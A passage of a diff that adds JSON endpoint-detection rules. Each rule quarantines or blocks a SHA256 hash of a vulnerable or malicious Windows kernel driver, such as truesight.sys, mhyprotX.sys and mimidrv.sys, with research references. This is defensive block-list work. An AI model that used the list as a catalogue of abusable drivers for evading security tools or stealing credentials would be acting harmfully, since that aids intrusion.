+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.830089Z",
+ "creation_date": "2026-03-23T11:45:31.830091Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.830096Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e824ccb01e6df3cee8077e15440de5b00fe40ffea71b6ead64cef1512d3a08a6",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ea40022-e9c4-58ba-948e-f98c8bd6db23",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.828419Z",
+ "creation_date": "2026-03-23T11:45:30.828421Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.828426Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "4144020a979834bc64cb19a0e82daa99462ccb3629b7a6f7cc9cd2beaf5909eb",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4eaa679c-df42-5f20-af10-74d8b9824439",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480488Z",
+ "creation_date": "2026-03-23T11:45:30.480490Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480496Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5d8a10b966e30ee6a696ecc6809936411be7ff672593998693c6b1a58baf0e42",
+ "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4eae0368-de5d-5c3c-91ab-7593b964862b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.973415Z",
+ "creation_date": "2026-03-23T11:45:29.973417Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.973423Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "7c731c0ea7f28671ab7787800db69739ea5cd6be16ea21045b4580cf95cbf73b",
+ "comment": "Trend Micro Anti-Rootkit Common Module vulnerable driver (aka TmComm.sys) [CVE-2007-0856] [https://www.loldrivers.io/drivers/22aa985b-5fdb-4e38-9382-a496220c27ec/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4eb460e8-ecfb-59cb-89e0-eb144d1327dd",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.612001Z",
+ "creation_date": "2026-03-23T11:45:29.612003Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.612008Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "24e70c87d58fa5771f02b9ddf0d8870cba6b26e35c6455a2c77f482e2080d3e9",
+ "comment": "Genshin Impact vulnerable driver (aka mhyprotX.sys) [https://www.trendmicro.com/en_us/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4eba68d7-ecce-58d5-bddf-d0358daea3e2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.820643Z",
+ "creation_date": "2026-03-23T11:45:31.820646Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.820655Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "1cf8b71409b1a00d032d9a62a90f50e3bc5e5b0d0963357d2cb20d48eb0cc32a",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ec44353-da03-55d2-8a5a-2061e4a3a66d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.619439Z",
+ "creation_date": "2026-03-23T11:45:29.619441Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.619446Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8944a3f50f38d92d17b8cfe2e08201a79ea30f38812d18f28036e59789d3f58c",
+ "comment": "Realtek vulnerable driver (aka rtkio64.sys, rtkiow10x64.sys and rtkiow8x64.sys) [https://github.com/blogresponder/Realtek-rtkio64-Windows-driver-privilege-escalation] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ec5c141-60d5-5a40-af5d-ba2cc6b3cb61",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827344Z",
+ "creation_date": "2026-03-23T11:45:30.827346Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827352Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e4e83f7397ed109520ed7651f57202cd7158317829a7b5ffb381e8caed4e42f4",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ed39125-ebe7-521f-9b53-879c593e1400",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.976029Z",
+ "creation_date": "2026-03-23T11:45:29.976031Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.976037Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "62bd7f8922d8b4ee00d1aea58a885a2c10cbe4c4e51f567b033454aacf7c6b99",
+ "comment": "SystemInformer driver (aka systeminformer.sys, formerly known as kprocesshacker.sys) [https://github.com/winsiderss/systeminformer] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ee58a94-1985-5751-81f2-acc544f27857",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.807678Z",
+ "creation_date": "2026-03-23T11:45:31.807680Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.807686Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "9e0c3b29e8e0118622b3f5fcdd104190329e2635660d8ff5870263ddf5d18d4f",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4ef02bdf-82fa-521a-a0e1-436b4c0e8617",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.145430Z",
+ "creation_date": "2026-03-23T11:45:31.145432Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.145437Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "39858843fe5f4c5b8969c6efc6817ba4e975be34cb8cab113456656e9b75f4d5",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4efb9e1b-db17-589d-a053-97d5eee4920d",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.466214Z",
+ "creation_date": "2026-03-23T11:45:30.466217Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.466225Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "28f5aa194a384680a08c0467e94a8fc40f8b0f3f2ac5deb42e0f51a80d27b553",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4effe5cc-109f-5e72-89e7-29ed3d359cf4",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.982467Z",
+ "creation_date": "2026-03-23T11:45:29.982469Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:29.982475Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "e2e17e6e222316a4c70dc931d5c550466eb5d3e325794731002792e5587dc29d",
+ "comment": "Vulnerable Kernel Driver (aka Lurker.sys) [https://www.loldrivers.io/drivers/3fb743b8-d3ed-4873-9c95-e212720dde21/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f0383de-b72b-50e7-b0a2-224d9fa9a78e",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.823790Z",
+ "creation_date": "2026-03-23T11:45:30.823792Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.823798Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "a2b3fb7a9a431d45d9225424448aed87b71f5dc7cf8a2c1591a77c86971becda",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f0c1cfd-8272-5153-9d6d-279f364bbf6b",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.824321Z",
+ "creation_date": "2026-03-23T11:45:31.824325Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.824332Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "3c596759c37c74fa2c6f423c86e3fbc7e69aa6d0ebf6f26b2ccd1c774cafbc06",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f1f256c-5765-5b52-b87f-9846fbfa3cd2",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.829167Z",
+ "creation_date": "2026-03-23T11:45:30.829169Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.829174Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "54905e43b198a32610a2b935f3dba88d81b41ebcc8e06f4639b92dfbdd0404bc",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f21976a-c425-531c-b322-010b83072fed",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.479565Z",
+ "creation_date": "2026-03-23T11:45:30.479567Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.479573Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "5a7bde3c194e84070ff15718e58b6d9a79d5b11fb4f5754ecbae9f6fee1ca40f",
+ "comment": "Malicious Kernel Driver (aka e939448b28a4edc81f1f974cebf6e7d2.sys) [https://www.loldrivers.io/drivers/4f2edf45-b135-404f-bedc-9583f0bae574/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f286794-21a5-5ea3-b11e-d9d1c0929e73",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:31.143562Z",
+ "creation_date": "2026-03-23T11:45:31.143564Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:31.143570Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "c66fd25fb23a21fdf502b1f750bd8d862e937eead46554c3c1d62eff67f549df",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f32b263-13d1-559f-9e6e-341050406195",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:32.144837Z",
+ "creation_date": "2026-03-23T11:45:32.144840Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:32.144845Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "146b8f4fc91a4915e8f6aa6e0d871f7161a809c46760ef602bab534836142436",
+ "comment": "Malicious Kernel Driver (aka driver_146b8f4f.sys) [https://www.loldrivers.io/drivers/cea8bd08-a3c5-4ae1-a568-387b909ada67/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f3a832f-bfef-50fd-a3e1-5e0aaee846f0",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.827199Z",
+ "creation_date": "2026-03-23T11:45:30.827201Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.827207Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "08e4f45807c9d9608d1d3283dad5d02c5714a47a7210e082f2607cd6d2f79bc9",
+ "comment": "Vulnerable Adlice Software Truesight/RogueKiller (v2.0.2) AntiMalware Driver (aka truesight.sys) [https://research.checkpoint.com/2025/large-scale-exploitation-of-legacy-driver/] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f4638e2-eb01-54a9-ad97-93d112a4f579",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.480370Z",
+ "creation_date": "2026-03-23T11:45:30.480372Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.480378Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "0abca92512fc98fe6c2e7d0a33935686fc3acbd0a4c68b51f4a70ece828c0664",
+ "comment": "Vulnerable Kernel Driver (aka GtcKmdfBs.sys) [https://blogs.vmware.com/security/2023/10/hunting-vulnerable-kernel-drivers.html] [file SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f46a8a1-84fd-5f2a-beb1-d251287e51ca",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:30.467471Z",
+ "creation_date": "2026-03-23T11:45:30.467486Z",
+ "enabled": true,
+ "block_on_agent": true,
+ "quarantine_on_agent": true,
+ "endpoint_detection": true,
+ "hl_status": "stable",
+ "hl_testing_start_time": "2026-03-23T11:45:30.467495Z",
+ "rule_level": null,
+ "rule_level_override": null,
+ "rule_confidence": null,
+ "rule_confidence_override": null,
+ "references": [],
+ "type": "hash",
+ "value": "8e1d02a67ad311f9e48d42813e6d208bda3e7e4da0d212d7b484a8454b41678c",
+ "comment": "Malicious Kernel Driver (aka mimidrv.sys) [https://www.loldrivers.io/drivers/87752fb8-e9f6-4235-91e2-c4343677d817/] [authentihash SHA256]",
+ "source": "af44d792-eb22-4e3f-88d2-9d1584001389"
+}
+{
+ "id": "4f4b14dd-30ae-5b7c-83a8-65a29f65bc88",
+ "test_maturity_current_count": 0,
+ "test_maturity_delay": 7,
+ "test_maturity_threshold": 10,
+ "global_state": "quarantine",
+ "effective_state": "quarantine",
+ "rule_effective_level": "critical",
+ "rule_effective_confidence": "moderate",
+ "source_id": "af44d792-eb22-4e3f-88d2-9d1584001389",
+ "rule_level_overridden": false,
+ "last_modifier": {
+ "id": 1,
+ "username": "system_supervisor"
+ },
+ "origin_stack_id": "b8e2fe4fc90e4d08",
+ "last_update": "2026-03-23T11:45:29.981260Z",
